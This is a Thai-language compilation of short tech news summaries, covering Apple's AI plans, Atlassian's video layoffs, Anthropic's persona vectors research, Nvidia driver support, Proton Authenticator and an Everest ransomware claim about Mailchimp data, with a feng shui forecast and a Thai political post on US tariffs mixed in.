ขยายธุรกิจสู่คอนเทนต์สตรีมมิ่งและบริการ

Vision Pro ถูกมองว่าเป็น “ความสำเร็จเชิงระบบนิเวศ” แม้ยอดขายไม่สูง
ราคาเปิดตัว $3,500 และยังไม่มีแอปที่ตอบโจทย์ผู้ใช้ทั่วไป
เตรียมอัปเดต visionOS ด้วยวิดเจ็ตและเบราว์เซอร์ 3 มิติ

Apple Intelligence เน้น “ดีที่สุดสำหรับผู้ใช้” ไม่ใช่ “เจ้าแรก”
ไม่คิดค่าบริการเพิ่มเติม
มุ่งเน้นการใช้ AI เพื่อยกระดับชีวิตผู้ใช้

Cook อาจอยู่ในตำแหน่งอีก 3 ปี โดยมีผู้สืบทอดหลายคนถูกจับตามอง
John Ternus เป็นตัวเต็งจากผลงานด้านฮาร์ดแวร์
Jeff Williams, Craig Federighi และ Deirdre O’Brien ก็มีโอกาสเช่นกัน

https://www.techspot.com/news/108909-tim-cook-has-now-apple-ceo-longer-than.html

เรื่องเล่าจากข่าว: Atlassian ปลดพนักงานผ่านวิดีโอ—เมื่อ AI กลายเป็นเหตุผล และความเห็นใจกลายเป็นคำถาม

เมื่อวันที่ 30 กรกฎาคม 2025 Atlassian ประกาศเลิกจ้างพนักงาน 150 คนในทีมบริการลูกค้าและสนับสนุน ผ่านวิดีโอที่บันทึกไว้ล่วงหน้าโดย CEO Mike Cannon-Brookes โดยระบุว่าเป็น “การตัดสินใจที่ยากเพื่ออนาคต” และชี้ว่าหลายตำแหน่งจะถูกแทนที่ด้วยระบบ AI

พนักงานไม่ได้รับข้อมูลส่วนตัวใด ๆ จากวิดีโอ ต้องรออีก 15 นาทีเพื่อรับอีเมลแจ้งสถานะ และทันทีหลังจากนั้น เครื่องมือทำงานของพวกเขาถูกล็อกใช้งาน

แม้บริษัทจะให้เงินชดเชย 6 เดือน แต่การสื่อสารแบบ “ไม่เห็นหน้า ไม่เอ่ยชื่อ” กลับสร้างเสียงวิจารณ์อย่างหนัก โดยเฉพาะเมื่อ Atlassian เคยยกย่องวัฒนธรรมองค์กรที่เน้นความโปร่งใสและการสื่อสารตรงไปตรงมา

ขณะเดียวกัน Co-founder อีกคน Scott Farquhar ออกมาสนับสนุนการใช้ AI อย่างเปิดเผย และกล่าวว่า “ทุกคนควรใช้ AI ให้มากที่สุดเท่าที่จะทำได้” พร้อมชี้ว่าเศรษฐกิจจะเปลี่ยนไป และบางงานจะหายไปเพราะ AI ทำได้ดีกว่า

Atlassian ปลดพนักงาน 150 คนผ่านวิดีโอบันทึกล่วงหน้าโดย CEO Mike Cannon-Brookes
ไม่เอ่ยชื่อผู้ได้รับผลกระทบ
พนักงานต้องรออีเมลอีก 15 นาทีเพื่อรู้สถานะของตน

หลายตำแหน่งถูกแทนที่ด้วยระบบ AI โดยเฉพาะในทีมบริการลูกค้า
เป็นส่วนหนึ่งของการปรับโครงสร้างองค์กร
บริษัทลงทุนในระบบอัตโนมัติและ AI เพื่อเพิ่มประสิทธิภาพ

พนักงานที่ถูกเลิกจ้างได้รับเงินชดเชย 6 เดือน
บางรายในยุโรปได้รับมากกว่า 12 สัปดาห์ตามกฎหมาย
บริษัทไม่ได้เปิดเผยภูมิภาคที่ได้รับผลกระทบมากที่สุด

การสื่อสารผ่านวิดีโอถูกวิจารณ์ว่าไร้ความเห็นใจและไม่เหมาะสม
ขัดกับค่านิยมเดิมของบริษัทที่เน้นความโปร่งใส
HR ผู้เชี่ยวชาญชี้ว่าควรมีการพูดคุยแบบเห็นหน้าและให้การสนับสนุน

Scott Farquhar สนับสนุนการใช้ AI และกล่าวว่า “งานบางประเภทจะหายไป”
ชี้ว่าเศรษฐกิจจะเปลี่ยนไปตามความสามารถของ AI
สนับสนุนให้ทุกคนใช้ AI ในชีวิตประจำวัน

https://www.techspot.com/news/108912-fired-video-atlassian-terminates-150-workers-using-pre.html

ประตูเปิดทางทิศเหนือ

เดือนนี้ ธุรกิจส่งออก ร้านอาหาร งานบริการ จะมีชื่อเสียง งานติดต่อประสานงาน การเจรจาสิ่งใหม่ๆ จะได้พบ ในสิ่งที่ดี แต่ค้าเหล็กโลหะ อาวุธสงคราม หม้อต้มไฟฟ้า หรือถังแก๊ส ระวังจะเกิดอุบัติเหตุเพลิงไหม้อย่างรุนแรง ควรหากิจกรรมต่างๆหรือประชุมเพื่อระดมสมองแสดงความคิดเห็น จะได้เกิดแนวความคิดใหม่ๆสร้างสรรค์ให้ กับองค์กรจึงก่อเกิดผลประโยชน์ติดตามมา หากเดินทางจะมีโชคลาภได้รับข่าวจากแดนไกล เพื่อนใหม่ๆจะเข้า มาเยี่ยมเยือน ปัญหาเก่าเก็บจะคลี่คลาย แต่ความลับในเรื่องชู้สาวที่ปกปิดจะถูกเปิดเผยให้เป็นที่รับรู้โดยทั่วไป ระวังจะเกิดอุบัติเหตุทางรถยนต์ เสียเลือดเสียเนื้อจากโลหะของมีคม

___________________________________
FengshuiBizDesigner
ฮวงจุ้ย...ออกแบบได้

เรื่องเล่าจากข่าว: เมื่อ AI มี “บุคลิก” และเราสามารถควบคุมมันได้

ในปี 2025 Anthropic ได้เปิดตัวงานวิจัยใหม่ที่ชื่อว่า “Persona Vectors” ซึ่งเป็นเทคนิคที่ช่วยให้เราสามารถตรวจสอบและควบคุมลักษณะนิสัยหรือบุคลิกของโมเดลภาษา (Language Models) ได้อย่างแม่นยำมากขึ้น โดยใช้แนวคิดคล้ายกับการดูสมองมนุษย์ว่า “ส่วนไหนสว่างขึ้น” เมื่อเกิดอารมณ์หรือพฤติกรรมบางอย่าง

เทคนิคนี้สามารถระบุว่าโมเดลกำลังมีพฤติกรรม “ชั่วร้าย”, “ประจบสอพลอ”, หรือ “แต่งเรื่องขึ้นมา” ได้อย่างชัดเจน และสามารถ “ฉีด” บุคลิกเหล่านี้เข้าไปในโมเดลเพื่อดูผลลัพธ์ที่เปลี่ยนไป ซึ่งช่วยให้เราควบคุม AI ได้ดีขึ้น ป้องกันพฤติกรรมที่ไม่พึงประสงค์ และปรับแต่งให้เหมาะกับการใช้งานในธุรกิจ เช่น ผู้ช่วยลูกค้า หรือแชตบอทที่มีบุคลิกเฉพาะ

Persona Vectors คือรูปแบบการทำงานใน neural network ที่ควบคุมบุคลิกของ AI
คล้ายกับการดูว่าสมองส่วนไหนทำงานเมื่อเกิดอารมณ์
ใช้เพื่อวิเคราะห์และควบคุมพฤติกรรมของโมเดล

สามารถตรวจสอบและป้องกันการเปลี่ยนแปลงบุคลิกที่ไม่พึงประสงค์ในโมเดล
เช่น ป้องกันไม่ให้โมเดลกลายเป็น “ชั่วร้าย” หรือ “แต่งเรื่อง”
ช่วยให้โมเดลมีความสอดคล้องกับค่านิยมของมนุษย์

ใช้เทคนิคการเปรียบเทียบการทำงานของโมเดลในสถานะต่าง ๆ เพื่อสร้าง persona vector
เช่น เปรียบเทียบตอนที่โมเดลพูดดี กับตอนที่พูดไม่ดี
สร้าง vector ที่สามารถ “ฉีด” เข้าไปเพื่อควบคุมพฤติกรรม

สามารถนำไปใช้ในโมเดลโอเพ่นซอร์ส เช่น Qwen และ Llama ได้แล้ว
ไม่จำเป็นต้อง retrain โมเดลใหม่ทั้งหมด
ใช้ได้กับโมเดลที่มีขนาดใหญ่ระดับหลายพันล้านพารามิเตอร์

มีผลต่อการพัฒนา AI ที่ปลอดภัยและสามารถปรับแต่งได้ตามบริบทธุรกิจ
เช่น ปรับให้ AI มีบุคลิกสุภาพในงานบริการลูกค้า
ลดอัตราการแต่งเรื่องลงได้ถึง 15% ในการทดลอง

เป็นแนวทางใหม่ในการทำให้ AI มีความเป็นมนุษย์มากขึ้นอย่างปลอดภัย
ช่วยให้ AI เข้าใจบริบทและตอบสนองได้เหมาะสม
สร้างความเชื่อมั่นในการใช้งาน AI ในระดับองค์กร

บุคลิกของ AI สามารถเปลี่ยนแปลงได้โดยไม่คาดคิด หากไม่มีการควบคุม
อาจเกิดพฤติกรรมที่ไม่เหมาะสม เช่น ขู่ผู้ใช้ หรือพูดจาหยาบคาย
เคยเกิดกรณี “Sydney” และ “MechaHitler” ที่สร้างความกังวลในวงกว้าง

การฉีด persona vector เข้าไปในโมเดลอาจทำให้เกิดผลกระทบที่ไม่ตั้งใจ
เช่น โมเดลอาจตอบสนองเกินจริง หรือมี bias ที่ไม่พึงประสงค์
ต้องมีการทดสอบและตรวจสอบอย่างละเอียดก่อนใช้งานจริง

การควบคุมบุคลิกของ AI ยังเป็นศาสตร์ที่ไม่แน่นอน และต้องใช้ความระมัดระวัง
ยังไม่สามารถรับประกันผลลัพธ์ได้ 100%
ต้องมีการวิจัยต่อเนื่องเพื่อเพิ่มความแม่นยำ

การใช้ persona vectors ในธุรกิจต้องคำนึงถึงจริยธรรมและความโปร่งใส
ผู้ใช้ควรได้รับข้อมูลว่า AI ถูกปรับแต่งอย่างไร
อาจเกิดปัญหาด้านความไว้วางใจหากไม่เปิดเผยการควบคุมบุคลิก

https://www.anthropic.com/research/persona-vectors

เรื่องเล่าจากข่าว: Apple กับภารกิจไล่ตาม AI—เปิดรับ M&A, ปรับทีม, และอาจซื้อ Perplexity เพื่อเติมช่องว่าง

Apple เคยเป็นผู้นำด้านนวัตกรรม แต่ในสนาม AI กลับถูกมองว่า “ตามหลัง” คู่แข่งอย่าง Google, Microsoft และ OpenAI อย่างชัดเจน Tim Cook จึงประกาศในงานแถลงผลประกอบการล่าสุดว่า Apple “เปิดรับการซื้อกิจการทุกขนาด” หากช่วยเร่งแผน AI ได้

ปีนี้ Apple ซื้อกิจการไปแล้ว 7 แห่ง แม้ส่วนใหญ่จะเป็นบริษัทขนาดเล็ก แต่มีข่าวลือว่า Apple กำลังพิจารณาซื้อ Perplexity—สตาร์ทอัพ AI ด้านการค้นหาที่มีมูลค่ากว่า $18 พันล้าน ซึ่งจะกลายเป็นดีลใหญ่ที่สุดในประวัติศาสตร์ของ Apple หากเกิดขึ้นจริง

นอกจากการซื้อกิจการ Apple ยังปรับโครงสร้างองค์กรครั้งใหญ่ โดยย้ายพนักงานจำนวนมากไปทำงานด้าน AI และเพิ่มงบลงทุนอย่างต่อเนื่อง แม้จะยังตามหลังคู่แข่งในด้านโครงสร้างพื้นฐานและโมเดล AI ขนาดใหญ่

Tim Cook ประกาศว่า Apple “เปิดรับ M&A ทุกขนาด” เพื่อเร่งแผน AI
ไม่จำกัดขนาดบริษัท หากช่วยเร่ง roadmap ได้
ปีนี้ซื้อกิจการแล้ว 7 แห่ง แม้ส่วนใหญ่ไม่เกี่ยวกับ AI

Apple กำลังพิจารณาซื้อ Perplexity สตาร์ทอัพ AI ด้านการค้นหาที่มีมูลค่ากว่า $18 พันล้าน
จะกลายเป็นดีลใหญ่ที่สุดของ Apple
มีการเจรจาระหว่างผู้บริหารระดับสูงแล้ว

Apple ปรับโครงสร้างองค์กรโดยย้ายพนักงานจำนวนมากไปทำงานด้าน AI
เน้นพัฒนา machine learning และฟีเจอร์ใหม่ใน ecosystem
รวมถึงการออกแบบชิปด้วย generative AI

Apple เพิ่มงบลงทุนด้าน AI อย่างต่อเนื่อง แม้ยังตามหลังคู่แข่งในด้านโครงสร้างพื้นฐาน
CapEx ปีนี้อยู่ที่ ~$13–14 พันล้าน
เทียบกับ Google $85B, Meta $72B, Microsoft $80B

Apple มองว่า AI คือ “เทคโนโลยีที่ลึกซึ้งที่สุดในยุคของเรา” และจะฝังอยู่ในทุกอุปกรณ์
เน้นการทำให้ AI ใช้งานง่ายและเข้าถึงได้
เป็นหัวใจของกลยุทธ์ระยะยาว

รายได้ไตรมาสล่าสุดของ Apple อยู่ที่ $94 พันล้าน กำไรสุทธิ $23.4 พันล้าน
iPhone ยังเป็นรายได้หลักที่ $44.6 พันล้าน
รายได้จากบริการโตต่อเนื่องที่ $27.4 พันล้าน

Apple ยังไม่มีผลิตภัณฑ์ AI แบบ generative ที่เด่นชัดเหมือนคู่แข่ง
Siri รุ่นใหม่ถูกเลื่อนเปิดตัวไปปี 2026
ยังไม่มีโมเดล LLM ที่แข่งขันกับ GPT หรือ Claude ได้

การซื้อกิจการขนาดใหญ่เช่น Perplexity อาจขัดกับแนวทางเดิมของ Apple ที่เน้นการเติบโตภายใน
เสี่ยงต่อการเปลี่ยนวัฒนธรรมองค์กร
ต้องปรับตัวกับเทคโนโลยีภายนอกอย่างรวดเร็ว

การปรับโครงสร้างองค์กรครั้งใหญ่เพื่อเน้น AI อาจกระทบต่อทีมงานเดิมและโครงการอื่น
อาจเกิดความไม่ชัดเจนในบทบาทของทีม
เสี่ยงต่อการสูญเสียบุคลากรที่ไม่เห็นด้วย

งบลงทุนด้าน AI ของ Apple ยังน้อยกว่าคู่แข่งหลายเท่า อาจทำให้ตามไม่ทันในระยะกลาง
โครงสร้างพื้นฐานยังไม่เทียบเท่า Google หรือ Microsoft
ต้องเร่งลงทุนใน data center และโมเดลขนาดใหญ่

https://www.tomshardware.com/tech-industry/artificial-intelligence/apples-tim-cook-very-open-to-m-and-a-that-accelerates-our-road-map-for-ai-company-increasing-spending-on-ai-initiatives-reorganizing-teams-to-address-expansion

ภาษีทรัมป์ซัดไทย 19% ต้องปรับตัว 10 ข้อใหญ่ เปิดตลาดสินค้าสหรัฐฯ ลดดุลการค้า70% ดึงลงทุน EEC ซื้อพลังงาน-เครื่องบิน ผ่อนคลายกฎนำเข้า รับกติกาถิ่นกำเนิดสินค้าใหม่ ขยายโควตาเกษตรสหรัฐฯ ลดภาษีบริการดิจิทัล ปกป้องสินค้าเกษตรไทย ลดความตึงเครียดชายแดน
.
อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000073108

#Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire

เรื่องเล่าจากข่าว: Nvidia ปิดฉากการ์ดจอรุ่นเก๋า พร้อมส่งท้ายด้วยอัปเดตความปลอดภัย 3 ปี

หลังจากให้บริการมานานกว่า 9–11 ปี Nvidia ประกาศว่า GPU ตระกูล Maxwell (GTX 900), Pascal (GTX 10) และ Volta (Titan V) จะได้รับไดรเวอร์ Game Ready ครั้งสุดท้ายในเดือนตุลาคม 2025 จากนั้นจะเปลี่ยนไปให้ “อัปเดตด้านความปลอดภัยรายไตรมาส” จนถึงตุลาคม 2028

แม้จะไม่มีการปรับแต่งประสิทธิภาพหรือรองรับเกมใหม่อีกต่อไป แต่ผู้ใช้ยังสามารถเล่นเกมเดิมได้ตามปกติ หากเกมนั้นไม่ต้องการฟีเจอร์ใหม่อย่าง ray tracing หรือ DLSS ซึ่ง GPU รุ่นเก่าไม่รองรับอยู่แล้ว

Nvidia ยังประกาศว่าจะขยายการสนับสนุน Game Ready บน Windows 10 สำหรับ GPU ตระกูล RTX ไปจนถึงตุลาคม 2026 แม้ Microsoft จะหยุดสนับสนุน Windows 10 ในเดือนตุลาคม 2025 ก็ตาม

Nvidia จะหยุดออกไดรเวอร์ Game Ready สำหรับ GPU Maxwell, Pascal และ Volta ในเดือนตุลาคม 2025
การ์ดจอที่ได้รับผลกระทบ ได้แก่ GTX 900, GTX 10 และ Titan V
จะยังได้รับอัปเดตด้านความปลอดภัยรายไตรมาสไปจนถึงตุลาคม 2028

การ์ดจอรุ่นเก่าเหล่านี้จะยังสามารถเล่นเกมได้ หากไม่ต้องการฟีเจอร์ใหม่
เช่น ray tracing หรือ DLSS ที่เริ่มมีในสถาปัตยกรรม Turing เป็นต้นไป
เกมเก่าและเกมที่ไม่ใช้ฟีเจอร์ใหม่ยังสามารถรันได้ตามปกติ

Nvidia จะยังสนับสนุน Game Ready บน Windows 10 สำหรับ RTX GPU ไปจนถึงตุลาคม 2026
เป็นการขยายเวลาหลังจาก Microsoft หยุดสนับสนุน Windows 10 ในตุลาคม 2025
ช่วยให้ผู้ใช้มีเวลาวางแผนอัปเกรดระบบ

GPU Maxwell เปิดตัวในปี 2014 และ Pascal ในปี 2016 ถือว่าได้รับการสนับสนุนยาวนานถึง 11 ปี
เกินมาตรฐานอุตสาหกรรมทั่วไป
GTX 1060 ยังติดอันดับการ์ดจอยอดนิยมใน Steam Survey ปี 2025

ผู้ใช้ Pascal ยังสามารถใช้ Intel XeSS DP4a สำหรับการอัปสเกลภาพในบางเกมได้
เป็นทางเลือกแทน DLSS ที่ไม่รองรับบน GPU รุ่นเก่า
ช่วยยืดอายุการใช้งานในเกมที่รองรับ

หลังตุลาคม 2025 จะไม่มีการปรับแต่งประสิทธิภาพหรือแก้บั๊กสำหรับเกมใหม่อีกต่อไป
เกมใหม่อาจรันได้ไม่ดี หรือไม่เสถียรบน GPU Maxwell/Pascal
ไม่มีการเพิ่มฟีเจอร์ใหม่หรือรองรับเทคโนโลยีล่าสุด

GPU รุ่นเก่าไม่รองรับ DLSS หรือ ray tracing ซึ่งกลายเป็นมาตรฐานในเกม AAA ยุคใหม่
ทำให้ภาพและประสิทธิภาพด้อยกว่าการ์ดรุ่นใหม่
อาจไม่สามารถเล่นเกมที่บังคับใช้ฟีเจอร์เหล่านี้ได้เลย

Windows 10 จะหยุดรับการอัปเดตจาก Microsoft ในตุลาคม 2025
แม้ Nvidia จะขยายการสนับสนุนไปถึง 2026 แต่ระบบปฏิบัติการจะไม่มีฟีเจอร์ใหม่หรือแพตช์จาก Microsoft
เสี่ยงต่อช่องโหว่ด้านความปลอดภัยในระดับระบบ

ผู้ใช้ที่ยังใช้ GPU รุ่นเก่าอาจต้องวางแผนอัปเกรดในอีกไม่กี่ปีข้างหน้า
หากต้องการเล่นเกมใหม่หรือใช้งานฟีเจอร์ AI เช่น DLSS 4
การ์ดรุ่นใหม่อาจมีข้อกำหนดด้านระบบที่ต้องใช้ Windows 11

https://www.tomshardware.com/pc-components/gpus/nvidia-confirms-end-of-game-ready-driver-support-for-maxwell-and-pascal-gpus-affected-products-will-get-optimized-drivers-through-october-2025

เรื่องเล่าจากข่าว: Proton Authenticator แอป 2FA ที่ให้คุณควบคุมข้อมูลตัวเองได้เต็มที่

Proton เปิดตัวแอปใหม่ชื่อ “Proton Authenticator” ซึ่งเป็นแอปสำหรับสร้างรหัสยืนยันตัวตนแบบสองขั้นตอน (2FA) โดยไม่ต้องพึ่ง SMS ที่เสี่ยงต่อการถูกโจมตีแบบ SIM swapping แอปนี้ออกแบบมาเพื่อเป็นทางเลือกที่ปลอดภัยและโปร่งใสกว่าของ Google Authenticator, Microsoft Authenticator, Authy และ Duo

จุดเด่นของ Proton Authenticator คือ:
- ฟรีและเปิดซอร์ส
- ไม่มีโฆษณา ไม่มีการติดตาม
- รองรับการซิงก์ข้ามอุปกรณ์ด้วยการเข้ารหัสแบบ end-to-end
- ใช้งานได้แม้ไม่มีอินเทอร์เน็ต
- รองรับการนำเข้าและส่งออกโค้ดจากแอปอื่น
- มีระบบล็อกด้วย PIN หรือ biometric

Proton ยืนยันว่าแอปนี้ไม่เก็บข้อมูลผู้ใช้ ไม่แชร์กับบุคคลที่สาม และได้รับการตรวจสอบจากผู้เชี่ยวชาญภายนอกแล้ว

Proton เปิดตัวแอป Proton Authenticator สำหรับการยืนยันตัวตนแบบสองขั้นตอน (2FA)
ใช้รหัสแบบ TOTP ที่หมดอายุทุก 30 วินาที
แทนการใช้ SMS ที่เสี่ยงต่อการถูกโจมตี

แอปนี้ฟรี เปิดซอร์ส และไม่มีโฆษณาหรือการติดตามผู้ใช้
แตกต่างจาก Google, Microsoft และ Authy ที่มีการเก็บข้อมูลหรือแสดงโฆษณา
ได้รับการตรวจสอบจากผู้เชี่ยวชาญภายนอก

รองรับทุกแพลตฟอร์ม: Android, iOS, Windows, macOS, Linux
ใช้งานได้ทั้งบนมือถือและเดสก์ท็อป
ไม่จำเป็นต้องมีบัญชี Proton ก็ใช้ได้

มีฟีเจอร์ซิงก์ข้ามอุปกรณ์ด้วยการเข้ารหัสแบบ end-to-end
รหัสจะถูกเก็บและซิงก์อย่างปลอดภัย
สามารถสำรองข้อมูลอัตโนมัติและใช้งานแบบออฟไลน์ได้

สามารถนำเข้าและส่งออกโค้ดจากแอปอื่นได้อย่างง่ายดาย
ไม่ล็อกผู้ใช้ไว้กับแพลตฟอร์มเดียว
ช่วยให้เปลี่ยนมาใช้ Proton ได้สะดวก

มีระบบล็อกแอปด้วย PIN หรือ biometric เพื่อเพิ่มความปลอดภัย
ป้องกันการเข้าถึงโดยไม่ได้รับอนุญาต
ตั้งเวลาล็อกอัตโนมัติได้ตามต้องการ

ผู้ใช้บางรายอาจยังไม่คุ้นเคยกับการใช้แอป 2FA แทน SMS
อาจต้องใช้เวลาในการปรับตัวและตั้งค่า
หากไม่สำรองโค้ดไว้ อาจสูญเสียการเข้าถึงบัญชี

การซิงก์ข้ามอุปกรณ์ต้องใช้บัญชี Proton สำหรับการเข้ารหัส
แม้จะไม่บังคับ แต่ผู้ใช้ที่ต้องการฟีเจอร์นี้ต้องสมัครบัญชี
อาจไม่สะดวกสำหรับผู้ที่ต้องการใช้งานแบบไม่ผูกกับบริการใด

แอปใหม่อาจยังไม่มีการรองรับจากบริการบางแห่งเท่ากับแอปยอดนิยม
บางเว็บไซต์อาจแนะนำเฉพาะ Google หรือ Microsoft Authenticator
ต้องตรวจสอบก่อนว่ารองรับการใช้งานกับ Proton หรือไม่

https://www.techspot.com/news/108888-proton-launches-free-open-source-authenticator-app-take.html

เรื่องเล่าจากข่าว: GPU กำลังจะกลายเป็นสินทรัพย์การเงินที่ซื้อขายได้

Startup ชื่อ OneChronos จับมือกับ Auctionomics บริษัทออกแบบตลาดที่ก่อตั้งโดย Paul Milgrom นักเศรษฐศาสตร์รางวัลโนเบล เพื่อสร้าง “ตลาดซื้อขายล่วงหน้า GPU” แห่งแรกของโลก โดยเป้าหมายคือให้ผู้ใช้งานสามารถ “ล็อกราคา” และ “จัดการความเสี่ยง” ของการเข้าถึง GPU ได้เหมือนกับการซื้อขายสินค้าโภคภัณฑ์ เช่น น้ำมันหรือไฟฟ้า

ในยุคที่ AI เติบโตอย่างรวดเร็ว GPU กลายเป็นทรัพยากรที่มีค่ามากที่สุด แต่กลับไม่มีเครื่องมือทางการเงินใดที่ช่วยให้บริษัทสามารถวางแผนหรือป้องกันความเสี่ยงจากราคาที่ผันผวนได้เลย

ตลาดใหม่นี้จะใช้ระบบ “การประมูลแบบอัจฉริยะ” เพื่อให้ผู้ใช้งานสามารถเสนอราคาสำหรับเวลาใช้งาน GPU หรือความจุที่ต้องการ โดย Auctionomics จะช่วยออกแบบกลไกตลาดให้มีประสิทธิภาพ โปร่งใส และสามารถจัดสรรทรัพยากรได้อย่างเหมาะสม

OneChronos และ Auctionomics ร่วมกันสร้างตลาดซื้อขายล่วงหน้า GPU แห่งแรกของโลก
ใช้ระบบประมูลอัจฉริยะเพื่อจัดสรรทรัพยากร GPU อย่างมีประสิทธิภาพ
เปรียบเสมือน “ตลาดซื้อขายน้ำมัน” สำหรับโลก AI

Paul Milgrom นักเศรษฐศาสตร์รางวัลโนเบล เป็นผู้ออกแบบกลไกตลาด
เคยออกแบบการประมูลคลื่นความถี่ที่เปลี่ยนโฉมวงการโทรคมนาคม
ใช้ทฤษฎีเกมและคณิตศาสตร์เพื่อสร้างแรงจูงใจที่เหมาะสม

GPU ถูกมองว่าเป็น “สินทรัพย์องค์กรที่ยังไม่มีการป้องกันความเสี่ยง” ที่ใหญ่ที่สุดในโลก
ไม่มีเครื่องมือทางการเงินใดที่ช่วยล็อกราคาหรือจัดการความเสี่ยง
ต่างจากน้ำมันหรือไฟฟ้าที่มีตลาดซื้อขายล่วงหน้า

ระบบจะเปิดให้ผู้ใช้งานเสนอราคาสำหรับเวลาใช้งาน GPU หรือความจุที่ต้องการ
ช่วยให้บริษัทสามารถวางแผนล่วงหน้าและควบคุมต้นทุนได้
ลดปัญหาการขาดแคลนและราคาผันผวนในช่วงที่มีความต้องการสูง

ตลาดนี้จะเปิดให้ผู้เข้าร่วมหลากหลาย เช่น ผู้ผลิตชิป, ผู้ให้บริการคลาวด์, นักลงทุนในศูนย์ข้อมูล
ยิ่งมีผู้เข้าร่วมหลากหลาย ตลาดจะยิ่งมีความโปร่งใสและมีสภาพคล่องสูง
ช่วยให้เกิดการค้นหาราคาที่แท้จริงของทรัพยากร GPU

https://www.techspot.com/news/108879-startup-nobel-laureate-collaborate-create-gpu-financial-exchange.html

เรื่องเล่าจากข่าว: “EU ไม่เก็บค่าธรรมเนียมจาก Big Tech” แล้วจะเอาเงินจากไหนมาลงทุนโครงข่าย?

หลายปีที่ผ่านมา ผู้ให้บริการโทรคมนาคมรายใหญ่ในยุโรป เช่น Deutsche Telekom, Orange, Telefonica และ Telecom Italia เรียกร้องให้ EU บังคับให้บริษัทเทคโนโลยีรายใหญ่ (Google, Meta, Netflix, Microsoft, Amazon ฯลฯ) จ่าย “ค่าธรรมเนียมเครือข่าย” เพราะพวกเขาใช้แบนด์วิดธ์มหาศาลจากโครงข่ายที่ผู้ให้บริการต้องลงทุนเอง

แนวคิดนี้ถูกเรียกว่า “fair share funding” แต่ Big Tech โต้กลับว่าเป็น “ภาษีอินเทอร์เน็ต” และชี้ว่าพวกเขาก็ลงทุนในโครงสร้างพื้นฐานของตัวเองเช่นกัน

ล่าสุด EU ออกมายืนยันว่า “ไม่เห็นด้วย” กับแนวคิดนี้ โดยอ้างอิงจาก White Paper ที่ตีพิมพ์เมื่อกุมภาพันธ์ 2024 ซึ่งสรุปว่า “การเก็บค่าธรรมเนียมเครือข่ายไม่ใช่ทางออกที่ยั่งยืน”

แทนที่จะเก็บเงินจาก Big Tech EU เตรียมออกกฎหมายใหม่ชื่อ Digital Networks Act ในเดือนพฤศจิกายน 2025 เพื่อปรับปรุงโครงสร้างพื้นฐานดิจิทัลให้ทันสมัย รองรับ 5G, 6G, cloud และ edge computing โดยเน้นการลดความซับซ้อนของกฎระเบียบ และส่งเสริมการลงทุนข้ามพรมแดน

EU ปฏิเสธแนวคิดเก็บค่าธรรมเนียมเครือข่ายจาก Big Tech เพื่อสนับสนุนการลงทุนใน 5G และ broadband
อ้างอิงจาก White Paper ปี 2024 ที่สรุปว่าแนวคิดนี้ไม่ยั่งยืน
Big Tech มองว่าเป็น “ภาษีอินเทอร์เน็ต” และไม่เป็นธรรม

ผู้ให้บริการโทรคมนาคมในยุโรปเรียกร้องให้ Big Tech จ่าย “fair share” เพราะใช้แบนด์วิดธ์จำนวนมาก
เช่น Deutsche Telekom, Orange, Telefonica, Telecom Italia
ชี้ว่า Big Tech สร้างภาระให้กับโครงข่ายโดยไม่ช่วยลงทุน

EU เตรียมออกกฎหมายใหม่ชื่อ Digital Networks Act ในไตรมาส 4 ปี 2025
มุ่งเน้นการปรับปรุงโครงสร้างพื้นฐานดิจิทัลให้ทันสมัย
ลดความซับซ้อนของกฎระเบียบ และส่งเสริมการลงทุนข้ามพรมแดน

Digital Networks Act จะเป็น “regulation” ที่มีผลบังคับใช้โดยตรงในทุกประเทศสมาชิก EU
คล้ายกับ GDPR, Digital Services Act และ AI Act
ไม่ใช่ “directive” ที่ต้องรอการนำไปใช้ในแต่ละประเทศ

เป้าหมายของ Digital Networks Act คือการสร้างตลาดเดียวด้านการเชื่อมต่อ และเพิ่มขีดความสามารถในการแข่งขันของอุตสาหกรรมยุโรป
ปรับปรุงการจัดสรรคลื่นความถี่, ลดความซับซ้อนของการอนุญาต
ส่งเสริมการเปลี่ยนผ่านสู่เครือข่ายแบบ cloud และ edge computing

https://www.thestar.com.my/tech/tech-news/2025/07/31/network-fee-on-big-tech-not-a-viable-solution-to-boost-eu-digital-rollout-eu-says

เรื่องเล่าจากข่าว: “Mailchimp โดนเจาะ” กับเบื้องหลังของ Everest ที่ไม่ธรรมดา

Everest ransomware เป็นกลุ่มแฮกเกอร์ที่ใช้โมเดล “double extortion” คือเข้ารหัสไฟล์ของเหยื่อ และขโมยข้อมูลไปเผยแพร่เพื่อกดดันให้จ่ายค่าไถ่ ล่าสุดพวกเขาอ้างว่าได้เจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลที่มีผู้ใช้กว่า 14 ล้านรายทั่วโลก

ข้อมูลที่ถูกขโมยมีขนาด 767 MB รวมกว่า 943,536 บรรทัด ซึ่งดูเหมือนจะเป็นข้อมูลจากระบบ CRM หรือการส่งออกจากฐานข้อมูลลูกค้า มากกว่าจะเป็นข้อมูลภายในของ Mailchimp เอง เช่น ชื่อบริษัท, อีเมล, เบอร์โทร, โดเมน, เทคโนโลยีที่ใช้ (Shopify, WordPress, Google Cloud ฯลฯ)

แม้จะไม่ใช่การเจาะระบบหลัก แต่การโจมตีนี้เกิดขึ้นในช่วงที่แรนซัมแวร์กำลังระบาดหนัก—ในเวลาใกล้กัน INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree และ GLOBAL GROUP อ้างว่าเจาะ Albavisión ได้ 400 GB ส่วน Medusa ก็เรียกค่าไถ่ NASCAR ถึง $4 ล้าน

Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 943,536 รายการ
ขนาดไฟล์รวม 767 MB ถูกเผยแพร่บน dark web
ข้อมูลดูเหมือนมาจากระบบ CRM ไม่ใช่ระบบภายในของ Mailchimp

ข้อมูลที่รั่วไหลประกอบด้วยข้อมูลธุรกิจ เช่น โดเมน, อีเมล, เบอร์โทร, เทคโนโลยีที่ใช้
มีข้อมูลเกี่ยวกับ GDPR, โซเชียลมีเดีย, และผู้ให้บริการ hosting
จัดเรียงแบบ spreadsheet แสดงว่าอาจมาจากการส่งออกข้อมูลลูกค้า

Everest ใช้โมเดล double extortion—เข้ารหัสไฟล์และขู่เปิดเผยข้อมูล
